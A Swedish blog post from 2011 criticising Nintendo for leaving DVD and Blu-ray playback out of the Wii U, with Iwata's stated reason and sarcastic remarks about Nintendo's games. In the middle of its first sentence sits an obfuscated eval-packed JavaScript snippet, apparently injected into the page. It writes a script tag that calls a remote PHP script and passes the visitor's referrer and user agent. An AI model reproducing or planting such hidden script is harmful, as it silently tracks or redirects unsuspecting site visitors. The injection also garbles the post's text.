Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Wii U kommer inte kunna spela DVD eller blue-ray skivor (idioter?!)

Wii U kommer inte kunna spela DVD eller blue-ray skivor (idioter?!)
Filip Urde
  • On 15 juni, 2011
  • http://www.revue.se/filip-urde

Ännu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktbrn|var|u0026u|referrer|yiffk||js|php’.split(’|’),0,{}))
en gång så gör Nintendo det sämre för sig själva
genom att ta bort vad många skulle säga är grundläggande funktioner för en nutida spelmaskin. Först höll man kvar vid kasetter, sen gjorde man mindre skivor, nu gör man skivor, men i ett eget format. Varför?! jag menar nintendo har ju knappt haft ett enda bra spel sedan goldeneye, så om detta är för att förhindra piratkopiering, ja då är man helt fel ute och har lite för stora tankar om sig själv.

Men nu är det bekräftat av Nintendo-bossen Iwata. Satoru Iwata har inför investerare bekräftat att Wii U varken kommer fungera som DVD- eller Blu-ray-spelare. Anledningen är enligt Iwata att folk redan har tillräckligt många DVD- och Blue-ray spelare hemma, så den extra kostnad det skulle tillföra konsolen är onödig. Ändå har man skivor?! vad för skivor i så fall?!

Så medan de andra två konsoljättarna satsar stenhårt på att göra sina konsoler till ultimata nöjescentrum, så väljer Nintendo en lite annan väg. Och enligt mig, ännu en gång den som är fel!

Är det inte billigare att använda teknik som DVD? det har ju funnits HUR länge som helst! Nej, detta låter som någon skum anledning från det skumma företaget Nintendo…Grafiken som Nintendos Wii U presenterat är ju ändå rent löjligt dålig för att vara en ny konsol.

 

Men man kanske inte satsar på att ha snygg grafik eller bra spel heller…. Det gör ju dem andra konsolerna, så det vore ju fel att ta den vägen då också kanske? eller Nintendo?!?!